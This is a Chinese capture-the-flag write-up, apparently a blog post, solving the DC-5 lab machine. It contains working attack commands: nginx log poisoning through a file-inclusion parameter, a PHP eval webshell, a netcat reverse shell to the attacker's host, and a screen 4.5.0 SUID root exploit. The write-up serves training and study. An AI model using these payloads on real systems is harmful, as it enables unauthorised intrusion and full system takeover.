DC-5靶机攻略

DC-5靶机通关攻略

信息收集

主机发现

nmap -sP 192.168.64.0/24 -oN nmap_sp

目标主机ip地址为:192.168.64.129

端口扫描

nmap -A 192.168.64.129 -oN namp_a
发现80

访问80端口

在这里插入图片描述

发现只有Contact页面有用,

尝试提交内容
在这里插入图片描述

刷新发现底部时间变化

在这里插入图片描述

推测这里存在文件包含

目录扫描

御剑扫描

访问footer.php

在这里插入图片描述

刷新

在这里插入图片描述

确定thankyou.php包含了footer.php,存在文件包含,可以尝试文件包含漏洞

渗透

由于该网站web中间件为nginx,网站上的每一步操作都会被写入日志文件

bp抓包get中写入
<?php phpinfo(); ?>
成功包含,证明存在文件包含漏洞

在这里插入图片描述

访问http://192.168.64.129/thankyou.php?file=/var/log/nginx/access.log

在这里插入图片描述

反弹shell

向get中写入一句话木马
<?php @eval($_REQUEST['abc']);?>
蚁剑连接

kali监听8080
nc -lvvp 8080

反弹shell
nc 192.168.64.128 8080 -e /bin/sh 

在这里插入图片描述

获得交互性shell

python -c 'import pty;pty.spawn("/bin/sh")'
find / -perm -4000 2>/dev/null  查询有suid权限的命令,使用时有所属者权限
发现screen 4.5.0  screen是多重视窗管理工具,通常只有在使用telnet登入主机会使用

漏洞查询

kali中查询
searchsploit screen 4.5.0
cat /usr/share/exploitdb/exploits/linux/local/41154.sh

在这里插入图片描述

漏洞利用

拷贝脚本

mkdir screen
cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/screen

将代码分三段保存

按照说明进行编译

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
由于我们现在没有权限将脚本放到目标主机,所以注意脚本说明和当前路径问题

在这里插入图片描述

脚本上传到tmp目录中

在这里插入图片描述

cd /tmp
./run.sh 发现报错

ls -l

-rw-r--r-- 1 www-data www-data 16136 Mar 12 05:40 libhax.so   
-rw-r--r-- 1 www-data www-data 16816 Mar 12 05:40 rootshell                                     
-rw-r--r-- 1 www-data www-data   248 Mar 12 05:40 run.sh  

发现run.sh没有执行权限

chmod 777 run.sh   给权限

./run.sh
id 发现拿到root权限

在这里插入图片描述

cd /root
ls
cat  thisistheflag.txt
通关!!

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值